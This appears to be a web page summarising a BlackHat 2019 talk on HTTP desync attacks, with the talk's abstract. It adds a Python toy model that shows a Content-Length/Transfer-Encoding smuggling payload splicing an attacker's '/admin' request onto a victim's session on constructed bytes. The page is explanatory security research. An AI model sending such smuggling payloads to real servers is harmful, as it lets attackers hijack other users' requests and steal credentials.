
HTTP Desync Attacks: Smashing into the Cell Next Door

Conference:  BlackHat USA 2019

2019-08-07

Summary

HTTP Desync Attacks allow remote, unauthenticated attackers to splice their requests into others, compromising web infrastructure and harvesting bug bounties. The speaker shares new tools and techniques to detect, assess, and exploit these vulnerabilities with minimal risk of collateral damage.
  • HTTP requests are traditionally viewed as isolated, standalone entities, but modern websites route each request through a chain of servers that talk to each other over HTTP on a stream-based transport such as TCP or TLS, so the boundary between one request and the next on that stream is whatever each server's parser decides it is.
  • An HTTP Desync Attack occurs when an attacker sends a message whose framing is ambiguous: the front end treats it as one request, while the back end parses it as two. The unread remainder becomes an arbitrary, attacker-controlled prefix applied to the next request that reaches the back end on that connection, which may be another user's.
  • The speaker shares case studies of exploiting real websites, delicately amending victims' requests to route them into malicious territory, invoke harmful responses, and lure credentials into their open arms.
  • The speaker also demonstrates using backend reassembly on your own requests to exploit every modicum of trust placed on the frontend, gain maximum privilege access to internal APIs, poison web caches, and compromise login pages.
  • The speaker unveils a vast expanse of vulnerable systems ranging from huge content delivery networks to bespoke backends and shares a refined methodology and open source tooling for black-box detection, assessment, and exploitation with minimal risk of collateral damage.
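
As an added example (written for this page, not the speaker's tooling or any vendor's code), the following toy model shows the framing ambiguity described above on a constructed byte stream. The summary does not name a specific technique, so this block assumes the classic disagreement between Content-Length and Transfer-Encoding: a front end that frames by Content-Length forwards the attacker's message as one request, while a back end that honours chunked encoding stops early and glues the leftover bytes onto the next request on the connection. The host `example.test`, the `/admin` path, the `X-Ignore` header and the victim's cookie are all made up for the illustration.

```python
# Added example for this page: a toy model of an HTTP desync, not the speaker's
# tooling. Assumption: the ambiguity is a request carrying both Content-Length
# and Transfer-Encoding, where the front end frames by Content-Length and the
# back end frames by chunked encoding. Both parsers are deliberately minimal
# models of that behaviour (no trailers, no chunk extensions), and every
# request below is constructed.

CRLF = b"\r\n"


def _split_head(stream: bytes):
    """Split one message off a byte stream into (start line, headers, rest)."""
    head, _, rest = stream.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, rest


def parse_by_content_length(stream: bytes):
    """Toy front end: frames every request purely by Content-Length."""
    requests = []
    while stream:
        start, headers, rest = _split_head(stream)
        length = int(headers.get(b"content-length", b"0"))
        requests.append((start, headers, rest[:length]))
        stream = rest[length:]
    return requests


def parse_by_chunked(stream: bytes):
    """Toy back end: honours Transfer-Encoding: chunked when present and
    ignores Content-Length in that case; otherwise frames by Content-Length."""
    requests = []
    while stream:
        start, headers, rest = _split_head(stream)
        if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
            body = b""
            while True:
                size_line, _, rest = rest.partition(CRLF)
                size = int(size_line.decode("ascii"), 16)
                if size == 0:
                    rest = rest[len(CRLF):]  # blank line that ends the chunked body
                    break
                body += rest[:size]
                rest = rest[size + len(CRLF):]  # skip chunk data and its CRLF
        else:
            length = int(headers.get(b"content-length", b"0"))
            body, rest = rest[:length], rest[length:]
        requests.append((start, headers, body))
        stream = rest
    return requests


# Constructed attacker request. Content-Length covers the whole body, so the
# front end forwards it as a single request. The back end stops at the 0-chunk
# and leaves PREFIX unread on the connection, where it is glued onto whatever
# arrives next. The trailing "X-Ignore: " turns the victim's request line into
# a harmless header value of the attacker's smuggled request.
PREFIX = b"GET /admin HTTP/1.1\r\nHost: example.test\r\nX-Ignore: "
ATTACK_BODY = b"0\r\n\r\n" + PREFIX
ATTACK = (
    b"POST / HTTP/1.1\r\nHost: example.test\r\n"
    b"Content-Length: " + str(len(ATTACK_BODY)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n\r\n" + ATTACK_BODY
)

# Constructed request from an unrelated user that happens to be next on the
# same back-end connection.
VICTIM = (
    b"GET /account HTTP/1.1\r\nHost: example.test\r\n"
    b"Cookie: session=victim\r\n\r\n"
)


def desync(stream: bytes = ATTACK + VICTIM):
    """Return what the front end and the back end each see on the same bytes."""
    return parse_by_content_length(stream), parse_by_chunked(stream)


if __name__ == "__main__":
    front, back = desync()
    print("front end sees:", [r[0] for r in front])
    print("back end sees: ", [r[0] for r in back])
    print("victim cookie now rides on:", back[1][0], back[1][1][b"cookie"])
```

Run stand-alone, the front end reports `POST /` followed by the victim's `GET /account`, while the back end reports `POST /` followed by `GET /admin`, with the victim's cookie attached to the attacker-chosen request and the victim's own request line swallowed into `X-Ignore`. That gap between the two parsers' views is the whole attack; real detection and exploitation tooling has to establish it without leaving a poisoned connection behind for other users, which is the collateral-damage concern the talk addresses.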
The speaker was initially wary of tackling HTTP Desync Attacks because of their complexity and the warnings surrounding them, chiefly the risk of collateral damage. After trying anyway, they earned bounties and got some memorable reactions: one program was convinced the vulnerability was fake, and another liked the unusual technique used on their website so much that they tried to apply it to other bug bounty sites behind the speaker's back.

Abstract

HTTP requests are traditionally viewed as isolated, standalone entities. In this session, I'll introduce techniques for remote, unauthenticated attackers to smash through this isolation and splice their requests into others, through which I was able to play puppeteer with the web infrastructure of numerous commercial and military systems, rain exploits on their visitors, and harvest over $50k in bug bounties.

Using these targets as case studies, I'll show you how to delicately amend victims' requests to route them into malicious territory, invoke harmful responses, and lure credentials into your open arms. I'll also demonstrate using backend reassembly on your own requests to exploit every modicum of trust placed on the frontend, gain maximum privilege access to internal APIs, poison web caches, and compromise what's possibly your most trusted login page.

This is an attack the web is thoroughly unprepared for. Although documented over a decade ago, a fearsome reputation for difficulty and collateral damage has left it optimistically ignored for years while the web's susceptibility grew. By applying fresh ideas and new techniques, I'll unveil a vast expanse of vulnerable systems ranging from huge content delivery networks to bespoke backends. I'll help you tackle this legacy by sharing a refined methodology and open source tooling for black-box detection, assessment and exploitation with minimal risk of collateral damage. These will be developed from core concepts, ensuring you leave equipped to devise your own desync techniques and tailor (or thwart) attacks against your target of choice.
